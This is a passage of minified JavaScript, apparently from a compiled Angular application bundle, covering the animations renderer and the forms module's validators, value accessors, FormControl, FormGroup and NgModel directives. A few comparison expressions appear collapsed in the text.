this.delegate.createElement(a,e)}createComment(a){return this.delegate.createComment(a)}createText(a){return this.delegate.createText(a)}appendChild(a,e){this.delegate.appendChild(a,e),this.engine.onInsert(this.namespaceId,e,a,!1)}insertBefore(a,e,i,n=!0){this.delegate.insertBefore(a,e,i),this.engine.onInsert(this.namespaceId,e,a,n)}removeChild(a,e,i){this.engine.onRemove(this.namespaceId,e,this.delegate,i)}selectRootElement(a,e){return this.delegate.selectRootElement(a,e)}parentNode(a){return this.delegate.parentNode(a)}nextSibling(a){return this.delegate.nextSibling(a)}setAttribute(a,e,i,n){this.delegate.setAttribute(a,e,i,n)}removeAttribute(a,e,i){this.delegate.removeAttribute(a,e,i)}addClass(a,e){this.delegate.addClass(a,e)}removeClass(a,e){this.delegate.removeClass(a,e)}setStyle(a,e,i,n){this.delegate.setStyle(a,e,i,n)}removeStyle(a,e,i){this.delegate.removeStyle(a,e,i)}setProperty(a,e,i){"@"==e.charAt(0)&&e==kO?this.disableAnimations(a,!!i):this.delegate.setProperty(a,e,i)}setValue(a,e){this.delegate.setValue(a,e)}listen(a,e,i){return this.delegate.listen(a,e,i)}disableAnimations(a,e){this.engine.disableAnimations(a,e)}}class qle extends PO{constructor(a,e,i,n){super(e,i,n),this.factory=a,this.namespaceId=e}setProperty(a,e,i){"@"==e.charAt(0)?"."==e.charAt(1)&&e==kO?this.disableAnimations(a,i=void 0===i||!!i):this.engine.process(this.namespaceId,a,e.slice(1),i):this.delegate.setProperty(a,e,i)}listen(a,e,i){if("@"==e.charAt(0)){const n=function Gle(t){switch(t){case"body":return document.body;case"document":return document;case"window":return window;default:return t}}(a);let r=e.slice(1),c="";return"@"!=r.charAt(0)&&([r,c]=function jle(t){const a=t.indexOf(".");return[t.substring(0,a),t.slice(a+1)]}(r)),this.engine.listen(this.namespaceId,n,r,c,d=>{this.factory.scheduleListenerCallback(d._data||-1,i,d)})}return this.delegate.listen(a,e,i)}}const OO=[{provide:QP,useClass:Vle},{provide:F6,useFactory:function $le(){return new hle}},{provide:A4,useClass:(()=>{class t extends A4{constructor(e,i,n,r){super(e.body,i,n)}ngOnDestroy(){this.flush()}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(w6),At(F6),At(Yf))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})()},{provide:qs,useFactory:function Kle(t,a,e){return new Ule(t,a,e)},deps:[r4,A4,qi]}],j6=[{provide:w6,useFactory:()=>new Fle},{provide:ar,useValue:"BrowserAnimations"},...OO],NO=[{provide:w6,useClass:sO},{provide:ar,useValue:"NoopAnimations"},...OO];let Xle=(()=>{class t{static withConfig(e){return{ngModule:t,providers:e.disableAnimations?NO:j6}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:j6,imports:[HP]}),t})();const{isArray:Yle}=Array,{getPrototypeOf:Jle,prototype:Zle,keys:ede}=Object;function LO(t){if(1===t.length){const a=t[0];if(Yle(a))return{args:a,keys:null};if(function tde(t){return t&&"object"==typeof t&&Jle(t)===Zle}(a)){const e=ede(a);return{args:e.map(i=>a[i]),keys:e}}}return{args:t,keys:null}}const{isArray:ide}=Array;function Q6(t){return Xe(a=>function ade(t,a){return ide(a)?t(...a):t(a)}(t,a))}function zO(t,a){return t.reduce((e,i,n)=>(e[i]=a[n],e),{})}function $6(...t){const a=yo(t),{args:e,keys:i}=LO(t),n=new G(r=>{const{length:c}=e;if(!c)return void r.complete();const d=new Array(c);let T=c,k=c;for(let q=0;q{Y||(Y=!0,k--),d[q]=te},()=>T--,void 0,()=>{(!T||!Y)&&(k||r.next(i?zO(i,d):d),r.complete())}))}});return a?n.pipe(Q6(a)):n}let WO=(()=>{class t{constructor(e,i){this._renderer=e,this._elementRef=i,this.onChange=n=>{},this.onTouched=()=>{}}setProperty(e,i){this._renderer.setProperty(this._elementRef.nativeElement,e,i)}registerOnTouched(e){this.onTouched=e}registerOnChange(e){this.onChange=e}setDisabledState(e){this.setProperty("disabled",e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi))},t.\u0275dir=Ot({type:t}),t})(),cg=(()=>{class t extends WO{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,features:[ci]}),t})();const Ls=new ni("NgValueAccessor"),ode={provide:Ls,useExisting:ja(()=>an),multi:!0},sde=new ni("CompositionEventMode");let an=(()=>{class t extends WO{constructor(e,i,n){super(e,i),this._compositionMode=n,this._composing=!1,null==this._compositionMode&&(this._compositionMode=!function rde(){const t=su()?su().getUserAgent():"";return/android (\d+)/.test(t.toLowerCase())}())}writeValue(e){this.setProperty("value",null==e?"":e)}_handleInput(e){(!this._compositionMode||this._compositionMode&&!this._composing)&&this.onChange(e)}_compositionStart(){this._composing=!0}_compositionEnd(e){this._composing=!1,this._compositionMode&&this.onChange(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi),Ee(sde,8))},t.\u0275dir=Ot({type:t,selectors:[["input","formControlName","",3,"type","checkbox"],["textarea","formControlName",""],["input","formControl","",3,"type","checkbox"],["textarea","formControl",""],["input","ngModel","",3,"type","checkbox"],["textarea","ngModel",""],["","ngDefaultControl",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i._handleInput(r.target.value)})("blur",function(){return i.onTouched()})("compositionstart",function(){return i._compositionStart()})("compositionend",function(r){return i._compositionEnd(r.target.value)})},features:[ki([ode]),ci]}),t})();function ip(t){return null==t||("string"==typeof t||Array.isArray(t))&&0===t.length}function VO(t){return null!=t&&"number"==typeof t.length}const ys=new ni("NgValidators"),ap=new ni("NgAsyncValidators"),lde=/^(?=.{1,254}$)(?=.{1,64}@)[a-zA-Z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-zA-Z0-9!#$%&'*+/=?^_`{|}~-]+)*@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/;class Td{static min(a){return BO(a)}static max(a){return HO(a)}static required(a){return UO(a)}static requiredTrue(a){return function qO(t){return!0===t.value?null:{required:!0}}(a)}static email(a){return function GO(t){return ip(t.value)||lde.test(t.value)?null:{email:!0}}(a)}static minLength(a){return function jO(t){return a=>ip(a.value)||!VO(a.value)?null:a.value.lengthVO(a.value)&&a.value.length>t?{maxlength:{requiredLength:t,actualLength:a.value.length}}:null}(a)}static pattern(a){return function $O(t){if(!t)return E4;let a,e;return"string"==typeof t?(e="","^"!==t.charAt(0)&&(e+="^"),e+=t,"$"!==t.charAt(t.length-1)&&(e+="$"),a=new RegExp(e)):(e=t.toString(),a=t),i=>{if(ip(i.value))return null;const n=i.value;return a.test(n)?null:{pattern:{requiredPattern:e,actualValue:n}}}}(a)}static nullValidator(a){return null}static compose(a){return eN(a)}static composeAsync(a){return tN(a)}}function BO(t){return a=>{if(ip(a.value)||ip(t))return null;const e=parseFloat(a.value);return!isNaN(e)&&e{if(ip(a.value)||ip(t))return null;const e=parseFloat(a.value);return!isNaN(e)&&e>t?{max:{max:t,actual:a.value}}:null}}function UO(t){return ip(t.value)?{required:!0}:null}function E4(t){return null}function KO(t){return null!=t}function XO(t){return qC(t)?Sa(t):t}function YO(t){let a={};return t.forEach(e=>{a=null!=e?Object.assign(Object.assign({},a),e):a}),0===Object.keys(a).length?null:a}function JO(t,a){return a.map(e=>e(t))}function ZO(t){return t.map(a=>function dde(t){return!t.validate}(a)?a:e=>a.validate(e))}function eN(t){if(!t)return null;const a=t.filter(KO);return 0==a.length?null:function(e){return YO(JO(e,a))}}function K6(t){return null!=t?eN(ZO(t)):null}function tN(t){if(!t)return null;const a=t.filter(KO);return 0==a.length?null:function(e){return $6(JO(e,a).map(XO)).pipe(Xe(YO))}}function X6(t){return null!=t?tN(ZO(t)):null}function iN(t,a){return null===t?[a]:Array.isArray(t)?[...t,a]:[t,a]}function aN(t){return t._rawValidators}function nN(t){return t._rawAsyncValidators}function Y6(t){return t?Array.isArray(t)?t:[t]:[]}function D4(t,a){return Array.isArray(t)?t.includes(a):t===a}function oN(t,a){const e=Y6(a);return Y6(t).forEach(n=>{D4(e,n)||e.push(n)}),e}function rN(t,a){return Y6(a).filter(e=>!D4(t,e))}class sN{constructor(){this._rawValidators=[],this._rawAsyncValidators=[],this._onDestroyCallbacks=[]}get value(){return this.control?this.control.value:null}get valid(){return this.control?this.control.valid:null}get invalid(){return this.control?this.control.invalid:null}get pending(){return this.control?this.control.pending:null}get disabled(){return this.control?this.control.disabled:null}get enabled(){return this.control?this.control.enabled:null}get errors(){return this.control?this.control.errors:null}get pristine(){return this.control?this.control.pristine:null}get dirty(){return this.control?this.control.dirty:null}get touched(){return this.control?this.control.touched:null}get status(){return this.control?this.control.status:null}get untouched(){return this.control?this.control.untouched:null}get statusChanges(){return this.control?this.control.statusChanges:null}get valueChanges(){return this.control?this.control.valueChanges:null}get path(){return null}_setValidators(a){this._rawValidators=a||[],this._composedValidatorFn=K6(this._rawValidators)}_setAsyncValidators(a){this._rawAsyncValidators=a||[],this._composedAsyncValidatorFn=X6(this._rawAsyncValidators)}get validator(){return this._composedValidatorFn||null}get asyncValidator(){return this._composedAsyncValidatorFn||null}_registerOnDestroy(a){this._onDestroyCallbacks.push(a)}_invokeOnDestroyCallbacks(){this._onDestroyCallbacks.forEach(a=>a()),this._onDestroyCallbacks=[]}reset(a){this.control&&this.control.reset(a)}hasError(a,e){return!!this.control&&this.control.hasError(a,e)}getError(a,e){return this.control?this.control.getError(a,e):null}}class fm extends sN{constructor(){super(...arguments),this._parent=null,this.name=null,this.valueAccessor=null}}class Jc extends sN{get formDirective(){return null}get path(){return null}}class cN{constructor(a){this._cd=a}get isTouched(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.touched)}get isUntouched(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.untouched)}get isPristine(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.pristine)}get isDirty(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.dirty)}get isValid(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.valid)}get isInvalid(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.invalid)}get isPending(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.pending)}get isSubmitted(){var a;return!(null===(a=this._cd)||void 0===a||!a.submitted)}}let Ta=(()=>{class t extends cN{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fm,2))},t.\u0275dir=Ot({type:t,selectors:[["","formControlName",""],["","ngModel",""],["","formControl",""]],hostVars:14,hostBindings:function(e,i){2&e&&Ct("ng-untouched",i.isUntouched)("ng-touched",i.isTouched)("ng-pristine",i.isPristine)("ng-dirty",i.isDirty)("ng-valid",i.isValid)("ng-invalid",i.isInvalid)("ng-pending",i.isPending)},features:[ci]}),t})(),lN=(()=>{class t extends cN{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jc,10))},t.\u0275dir=Ot({type:t,selectors:[["","formGroupName",""],["","formArrayName",""],["","ngModelGroup",""],["","formGroup",""],["form",3,"ngNoForm",""],["","ngForm",""]],hostVars:16,hostBindings:function(e,i){2&e&&Ct("ng-untouched",i.isUntouched)("ng-touched",i.isTouched)("ng-pristine",i.isPristine)("ng-dirty",i.isDirty)("ng-valid",i.isValid)("ng-invalid",i.isInvalid)("ng-pending",i.isPending)("ng-submitted",i.isSubmitted)},features:[ci]}),t})();const fy="VALID",w4="INVALID",C1="PENDING",py="DISABLED";function tx(t){return(I4(t)?t.validators:t)||null}function mN(t){return Array.isArray(t)?K6(t):t||null}function ix(t,a){return(I4(a)?a.asyncValidators:t)||null}function uN(t){return Array.isArray(t)?X6(t):t||null}function I4(t){return null!=t&&!Array.isArray(t)&&"object"==typeof t}class pN{constructor(a,e){this._pendingDirty=!1,this._hasOwnPendingAsyncValidator=!1,this._pendingTouched=!1,this._onCollectionChange=()=>{},this._parent=null,this.pristine=!0,this.touched=!1,this._onDisabledChange=[],this._rawValidators=a,this._rawAsyncValidators=e,this._composedValidatorFn=mN(this._rawValidators),this._composedAsyncValidatorFn=uN(this._rawAsyncValidators)}get validator(){return this._composedValidatorFn}set validator(a){this._rawValidators=this._composedValidatorFn=a}get asyncValidator(){return this._composedAsyncValidatorFn}set asyncValidator(a){this._rawAsyncValidators=this._composedAsyncValidatorFn=a}get parent(){return this._parent}get valid(){return this.status===fy}get invalid(){return this.status===w4}get pending(){return this.status==C1}get disabled(){return this.status===py}get enabled(){return this.status!==py}get dirty(){return!this.pristine}get untouched(){return!this.touched}get updateOn(){return this._updateOn?this._updateOn:this.parent?this.parent.updateOn:"change"}setValidators(a){this._rawValidators=a,this._composedValidatorFn=mN(a)}setAsyncValidators(a){this._rawAsyncValidators=a,this._composedAsyncValidatorFn=uN(a)}addValidators(a){this.setValidators(oN(a,this._rawValidators))}addAsyncValidators(a){this.setAsyncValidators(oN(a,this._rawAsyncValidators))}removeValidators(a){this.setValidators(rN(a,this._rawValidators))}removeAsyncValidators(a){this.setAsyncValidators(rN(a,this._rawAsyncValidators))}hasValidator(a){return D4(this._rawValidators,a)}hasAsyncValidator(a){return D4(this._rawAsyncValidators,a)}clearValidators(){this.validator=null}clearAsyncValidators(){this.asyncValidator=null}markAsTouched(a={}){this.touched=!0,this._parent&&!a.onlySelf&&this._parent.markAsTouched(a)}markAllAsTouched(){this.markAsTouched({onlySelf:!0}),this._forEachChild(a=>a.markAllAsTouched())}markAsUntouched(a={}){this.touched=!1,this._pendingTouched=!1,this._forEachChild(e=>{e.markAsUntouched({onlySelf:!0})}),this._parent&&!a.onlySelf&&this._parent._updateTouched(a)}markAsDirty(a={}){this.pristine=!1,this._parent&&!a.onlySelf&&this._parent.markAsDirty(a)}markAsPristine(a={}){this.pristine=!0,this._pendingDirty=!1,this._forEachChild(e=>{e.markAsPristine({onlySelf:!0})}),this._parent&&!a.onlySelf&&this._parent._updatePristine(a)}markAsPending(a={}){this.status=C1,!1!==a.emitEvent&&this.statusChanges.emit(this.status),this._parent&&!a.onlySelf&&this._parent.markAsPending(a)}disable(a={}){const e=this._parentMarkedDirty(a.onlySelf);this.status=py,this.errors=null,this._forEachChild(i=>{i.disable(Object.assign(Object.assign({},a),{onlySelf:!0}))}),this._updateValue(),!1!==a.emitEvent&&(this.valueChanges.emit(this.value),this.statusChanges.emit(this.status)),this._updateAncestors(Object.assign(Object.assign({},a),{skipPristineCheck:e})),this._onDisabledChange.forEach(i=>i(!0))}enable(a={}){const e=this._parentMarkedDirty(a.onlySelf);this.status=fy,this._forEachChild(i=>{i.enable(Object.assign(Object.assign({},a),{onlySelf:!0}))}),this.updateValueAndValidity({onlySelf:!0,emitEvent:a.emitEvent}),this._updateAncestors(Object.assign(Object.assign({},a),{skipPristineCheck:e})),this._onDisabledChange.forEach(i=>i(!1))}_updateAncestors(a){this._parent&&!a.onlySelf&&(this._parent.updateValueAndValidity(a),a.skipPristineCheck||this._parent._updatePristine(),this._parent._updateTouched())}setParent(a){this._parent=a}getRawValue(){return this.value}updateValueAndValidity(a={}){this._setInitialStatus(),this._updateValue(),this.enabled&&(this._cancelExistingSubscription(),this.errors=this._runValidator(),this.status=this._calculateStatus(),(this.status===fy||this.status===C1)&&this._runAsyncValidator(a.emitEvent)),!1!==a.emitEvent&&(this.valueChanges.emit(this.value),this.statusChanges.emit(this.status)),this._parent&&!a.onlySelf&&this._parent.updateValueAndValidity(a)}_updateTreeValidity(a={emitEvent:!0}){this._forEachChild(e=>e._updateTreeValidity(a)),this.updateValueAndValidity({onlySelf:!0,emitEvent:a.emitEvent})}_setInitialStatus(){this.status=this._allControlsDisabled()?py:fy}_runValidator(){return this.validator?this.validator(this):null}_runAsyncValidator(a){if(this.asyncValidator){this.status=C1,this._hasOwnPendingAsyncValidator=!0;const e=XO(this.asyncValidator(this));this._asyncValidationSubscription=e.subscribe(i=>{this._hasOwnPendingAsyncValidator=!1,this.setErrors(i,{emitEvent:a})})}}_cancelExistingSubscription(){this._asyncValidationSubscription&&(this._asyncValidationSubscription.unsubscribe(),this._hasOwnPendingAsyncValidator=!1)}setErrors(a,e={}){this.errors=a,this._updateControlsErrors(!1!==e.emitEvent)}get(a){let e=a;return null==e||(Array.isArray(e)||(e=e.split(".")),0===e.length)?null:e.reduce((i,n)=>i&&i._find(n),this)}getError(a,e){const i=e?this.get(e):this;return i&&i.errors?i.errors[a]:null}hasError(a,e){return!!this.getError(a,e)}get root(){let a=this;for(;a._parent;)a=a._parent;return a}_updateControlsErrors(a){this.status=this._calculateStatus(),a&&this.statusChanges.emit(this.status),this._parent&&this._parent._updateControlsErrors(a)}_initObservables(){this.valueChanges=new Tt,this.statusChanges=new Tt}_calculateStatus(){return this._allControlsDisabled()?py:this.errors?w4:this._hasOwnPendingAsyncValidator||this._anyControlsHaveStatus(C1)?C1:this._anyControlsHaveStatus(w4)?w4:fy}_anyControlsHaveStatus(a){return this._anyControls(e=>e.status===a)}_anyControlsDirty(){return this._anyControls(a=>a.dirty)}_anyControlsTouched(){return this._anyControls(a=>a.touched)}_updatePristine(a={}){this.pristine=!this._anyControlsDirty(),this._parent&&!a.onlySelf&&this._parent._updatePristine(a)}_updateTouched(a={}){this.touched=this._anyControlsTouched(),this._parent&&!a.onlySelf&&this._parent._updateTouched(a)}_registerOnCollectionChange(a){this._onCollectionChange=a}_setUpdateStrategy(a){I4(a)&&null!=a.updateOn&&(this._updateOn=a.updateOn)}_parentMarkedDirty(a){return!a&&!(!this._parent||!this._parent.dirty)&&!this._parent._anyControlsDirty()}_find(a){return null}}class R4 extends pN{constructor(a,e,i){super(tx(e),ix(i,e)),this.controls=a,this._initObservables(),this._setUpdateStrategy(e),this._setUpControls(),this.updateValueAndValidity({onlySelf:!0,emitEvent:!!this.asyncValidator})}registerControl(a,e){return this.controls[a]?this.controls[a]:(this.controls[a]=e,e.setParent(this),e._registerOnCollectionChange(this._onCollectionChange),e)}addControl(a,e,i={}){this.registerControl(a,e),this.updateValueAndValidity({emitEvent:i.emitEvent}),this._onCollectionChange()}removeControl(a,e={}){this.controls[a]&&this.controls[a]._registerOnCollectionChange(()=>{}),delete this.controls[a],this.updateValueAndValidity({emitEvent:e.emitEvent}),this._onCollectionChange()}setControl(a,e,i={}){this.controls[a]&&this.controls[a]._registerOnCollectionChange(()=>{}),delete this.controls[a],e&&this.registerControl(a,e),this.updateValueAndValidity({emitEvent:i.emitEvent}),this._onCollectionChange()}contains(a){return this.controls.hasOwnProperty(a)&&this.controls[a].enabled}setValue(a,e={}){(function fN(t,a,e){t._forEachChild((i,n)=>{if(void 0===e[n])throw new gi(1002,"")})})(this,0,a),Object.keys(a).forEach(i=>{(function hN(t,a,e){const i=t.controls;if(!(a?Object.keys(i):i).length)throw new gi(1e3,"");if(!i[e])throw new gi(1001,"")})(this,!0,i),this.controls[i].setValue(a[i],{onlySelf:!0,emitEvent:e.emitEvent})}),this.updateValueAndValidity(e)}patchValue(a,e={}){null!=a&&(Object.keys(a).forEach(i=>{const n=this.controls[i];n&&n.patchValue(a[i],{onlySelf:!0,emitEvent:e.emitEvent})}),this.updateValueAndValidity(e))}reset(a={},e={}){this._forEachChild((i,n)=>{i.reset(a[n],{onlySelf:!0,emitEvent:e.emitEvent})}),this._updatePristine(e),this._updateTouched(e),this.updateValueAndValidity(e)}getRawValue(){return this._reduceChildren({},(a,e,i)=>(a[i]=e.getRawValue(),a))}_syncPendingControls(){let a=this._reduceChildren(!1,(e,i)=>!!i._syncPendingControls()||e);return a&&this.updateValueAndValidity({onlySelf:!0}),a}_forEachChild(a){Object.keys(this.controls).forEach(e=>{const i=this.controls[e];i&&a(i,e)})}_setUpControls(){this._forEachChild(a=>{a.setParent(this),a._registerOnCollectionChange(this._onCollectionChange)})}_updateValue(){this.value=this._reduceValue()}_anyControls(a){for(const[e,i]of Object.entries(this.controls))if(this.contains(e)&&a(i))return!0;return!1}_reduceValue(){return this._reduceChildren({},(e,i,n)=>((i.enabled||this.disabled)&&(e[n]=i.value),e))}_reduceChildren(a,e){let i=a;return this._forEachChild((n,r)=>{i=e(i,n,r)}),i}_allControlsDisabled(){for(const a of Object.keys(this.controls))if(this.controls[a].enabled)return!1;return Object.keys(this.controls).length>0||this.disabled}_find(a){return this.controls.hasOwnProperty(a)?this.controls[a]:null}}function S4(t,a){return[...a.path,t]}function _y(t,a){var e,i;ax(t,a),a.valueAccessor.writeValue(t.value),t.disabled&&(null===(i=(e=a.valueAccessor).setDisabledState)||void 0===i||i.call(e,!0)),function yde(t,a){a.valueAccessor.registerOnChange(e=>{t._pendingValue=e,t._pendingChange=!0,t._pendingDirty=!0,"change"===t.updateOn&&_N(t,a)})}(t,a),function Mde(t,a){const e=(i,n)=>{a.valueAccessor.writeValue(i),n&&a.viewToModelUpdate(i)};t.registerOnChange(e),a._registerOnDestroy(()=>{t._unregisterOnChange(e)})}(t,a),function bde(t,a){a.valueAccessor.registerOnTouched(()=>{t._pendingTouched=!0,"blur"===t.updateOn&&t._pendingChange&&_N(t,a),"submit"!==t.updateOn&&t.markAsTouched()})}(t,a),function Cde(t,a){if(a.valueAccessor.setDisabledState){const e=i=>{a.valueAccessor.setDisabledState(i)};t.registerOnDisabledChange(e),a._registerOnDestroy(()=>{t._unregisterOnDisabledChange(e)})}}(t,a)}function k4(t,a,e=!0){const i=()=>{};a.valueAccessor&&(a.valueAccessor.registerOnChange(i),a.valueAccessor.registerOnTouched(i)),O4(t,a),t&&(a._invokeOnDestroyCallbacks(),t._registerOnCollectionChange(()=>{}))}function P4(t,a){t.forEach(e=>{e.registerOnValidatorChange&&e.registerOnValidatorChange(a)})}function ax(t,a){const e=aN(t);null!==a.validator?t.setValidators(iN(e,a.validator)):"function"==typeof e&&t.setValidators([e]);const i=nN(t);null!==a.asyncValidator?t.setAsyncValidators(iN(i,a.asyncValidator)):"function"==typeof i&&t.setAsyncValidators([i]);const n=()=>t.updateValueAndValidity();P4(a._rawValidators,n),P4(a._rawAsyncValidators,n)}function O4(t,a){let e=!1;if(null!==t){if(null!==a.validator){const n=aN(t);if(Array.isArray(n)&&n.length>0){const r=n.filter(c=>c!==a.validator);r.length!==n.length&&(e=!0,t.setValidators(r))}}if(null!==a.asyncValidator){const n=nN(t);if(Array.isArray(n)&&n.length>0){const r=n.filter(c=>c!==a.asyncValidator);r.length!==n.length&&(e=!0,t.setAsyncValidators(r))}}}const i=()=>{};return P4(a._rawValidators,i),P4(a._rawAsyncValidators,i),e}function _N(t,a){t._pendingDirty&&t.markAsDirty(),t.setValue(t._pendingValue,{emitModelToViewChange:!1}),a.viewToModelUpdate(t._pendingValue),t._pendingChange=!1}function gN(t,a){ax(t,a)}function nx(t,a){if(!t.hasOwnProperty("model"))return!1;const e=t.model;return!!e.isFirstChange()||!Object.is(a,e.currentValue)}function yN(t,a){t._syncPendingControls(),a.forEach(e=>{const i=e.control;"submit"===i.updateOn&&i._pendingChange&&(e.viewToModelUpdate(i._pendingValue),i._pendingChange=!1)})}function ox(t,a){if(!a)return null;let e,i,n;return Array.isArray(a),a.forEach(r=>{r.constructor===an?e=r:function Tde(t){return Object.getPrototypeOf(t.constructor)===cg}(r)?i=r:n=r}),n||i||e||null}const Dde={provide:Jc,useExisting:ja(()=>y1)},gy=(()=>Promise.resolve())();let y1=(()=>{class t extends Jc{constructor(e,i){super(),this.submitted=!1,this._directives=new Set,this.ngSubmit=new Tt,this.form=new R4({},K6(e),X6(i))}ngAfterViewInit(){this._setUpdateStrategy()}get formDirective(){return this}get control(){return this.form}get path(){return[]}get controls(){return this.form.controls}addControl(e){gy.then(()=>{const i=this._findContainer(e.path);e.control=i.registerControl(e.name,e.control),_y(e.control,e),e.control.updateValueAndValidity({emitEvent:!1}),this._directives.add(e)})}getControl(e){return this.form.get(e.path)}removeControl(e){gy.then(()=>{const i=this._findContainer(e.path);i&&i.removeControl(e.name),this._directives.delete(e)})}addFormGroup(e){gy.then(()=>{const i=this._findContainer(e.path),n=new R4({});gN(n,e),i.registerControl(e.name,n),n.updateValueAndValidity({emitEvent:!1})})}removeFormGroup(e){gy.then(()=>{const i=this._findContainer(e.path);i&&i.removeControl(e.name)})}getFormGroup(e){return this.form.get(e.path)}updateModel(e,i){gy.then(()=>{this.form.get(e.path).setValue(i)})}setValue(e){this.control.setValue(e)}onSubmit(e){var i;return this.submitted=!0,yN(this.form,this._directives),this.ngSubmit.emit(e),"dialog"===(null===(i=null==e?void 0:e.target)||void 0===i?void 0:i.method)}onReset(){this.resetForm()}resetForm(e){this.form.reset(e),this.submitted=!1}_setUpdateStrategy(){this.options&&null!=this.options.updateOn&&(this.form._updateOn=this.options.updateOn)}_findContainer(e){return e.pop(),e.length?this.form.get(e):this.form}}return t.\u0275fac=function(e){return new(e||t)(Ee(ys,10),Ee(ap,10))},t.\u0275dir=Ot({type:t,selectors:[["form",3,"ngNoForm","",3,"formGroup",""],["ng-form"],["","ngForm",""]],hostBindings:function(e,i){1&e&&he("submit",function(r){return i.onSubmit(r)})("reset",function(){return i.onReset()})},inputs:{options:["ngFormOptions","options"]},outputs:{ngSubmit:"ngSubmit"},exportAs:["ngForm"],features:[ki([Dde]),ci]}),t})();function bN(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}function MN(t){return"object"==typeof t&&null!==t&&2===Object.keys(t).length&&"value"in t&&"disabled"in t}const lu=class extends pN{constructor(a=null,e,i){super(tx(e),ix(i,e)),this.defaultValue=null,this._onChange=[],this._pendingChange=!1,this._applyFormState(a),this._setUpdateStrategy(e),this._initObservables(),this.updateValueAndValidity({onlySelf:!0,emitEvent:!!this.asyncValidator}),I4(e)&&(e.nonNullable||e.initialValueIsDefault)&&(this.defaultValue=MN(a)?a.value:a)}setValue(a,e={}){this.value=this._pendingValue=a,this._onChange.length&&!1!==e.emitModelToViewChange&&this._onChange.forEach(i=>i(this.value,!1!==e.emitViewToModelChange)),this.updateValueAndValidity(e)}patchValue(a,e={}){this.setValue(a,e)}reset(a=this.defaultValue,e={}){this._applyFormState(a),this.markAsPristine(e),this.markAsUntouched(e),this.setValue(this.value,e),this._pendingChange=!1}_updateValue(){}_anyControls(a){return!1}_allControlsDisabled(){return this.disabled}registerOnChange(a){this._onChange.push(a)}_unregisterOnChange(a){bN(this._onChange,a)}registerOnDisabledChange(a){this._onDisabledChange.push(a)}_unregisterOnDisabledChange(a){bN(this._onDisabledChange,a)}_forEachChild(a){}_syncPendingControls(){return!("submit"!==this.updateOn||(this._pendingDirty&&this.markAsDirty(),this._pendingTouched&&this.markAsTouched(),!this._pendingChange)||(this.setValue(this._pendingValue,{onlySelf:!0,emitModelToViewChange:!1}),0))}_applyFormState(a){MN(a)?(this.value=this._pendingValue=a.value,a.disabled?this.disable({onlySelf:!0,emitEvent:!1}):this.enable({onlySelf:!0,emitEvent:!1})):this.value=this._pendingValue=a}},Ide={provide:fm,useExisting:ja(()=>Ea)},TN=(()=>Promise.resolve())();let Ea=(()=>{class t extends fm{constructor(e,i,n,r,c){super(),this._changeDetectorRef=c,this.control=new lu,this._registered=!1,this.update=new Tt,this._parent=e,this._setValidators(i),this._setAsyncValidators(n),this.valueAccessor=ox(0,r)}ngOnChanges(e){if(this._checkForErrors(),!this._registered||"name"in e){if(this._registered&&(this._checkName(),this.formDirective)){const i=e.name.previousValue;this.formDirective.removeControl({name:i,path:this._getPath(i)})}this._setUpControl()}"isDisabled"in e&&this._updateDisabled(e),nx(e,this.viewModel)&&(this._updateValue(this.model),this.viewModel=this.model)}ngOnDestroy(){this.formDirective&&this.formDirective.removeControl(this)}get path(){return this._getPath(this.name)}get formDirective(){return this._parent?this._parent.formDirective:null}viewToModelUpdate(e){this.viewModel=e,this.update.emit(e)}_setUpControl(){this._setUpdateStrategy(),this._isStandalone()?this._setUpStandalone():this.formDirective.addControl(this),this._registered=!0}_setUpdateStrategy(){this.options&&null!=this.options.updateOn&&(this.control._updateOn=this.options.updateOn)}_isStandalone(){return!this._parent||!(!this.options||!this.options.standalone)}_setUpStandalone(){_y(this.control,this),this.control.updateValueAndValidity({emitEvent:!1})}_checkForErrors(){this._isStandalone()||this._checkParentType(),this._checkName()}_checkParentType(){}_checkName(){this.options&&this.options.name&&(this.name=this.options.name),this._isStandalone()}_updateValue(e){TN.then(()=>{var i;this.control.setValue(e,{emitViewToModelChange:!1}),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()})}_updateDisabled(e){const i=e.isDisabled.currentValue,n=0!==i&&Eh(i);TN.then(()=>{var r;n&&!this.control.disabled?this.control.disable():!n&&this.control.disabled&&this.control.enable(),null===(r=this._changeDetectorRef)||void 0===r||r.markForCheck()})}_getPath(e){return this._parent?S4(e,this._parent):[e]}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jc,9),Ee(ys,10),Ee(ap,10),Ee(Ls,10),Ee(Ma,8))},t.\u0275dir=Ot({type:t,selectors:[["","ngModel","",3,"formControlName","",3,"formControl",""]],inputs:{name:"name",isDisabled:["disabled","isDisabled"],model:["ngModel","model"],options:["ngModelOptions","options"]},outputs:{update:"ngModelChange"},exportAs:["ngModel"],features:[ki([Ide]),ci,sa]}),t})(),EN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["form",3,"ngNoForm","",3,"ngNativeValidate",""]],hostAttrs:["novalidate",""]}),t})();const 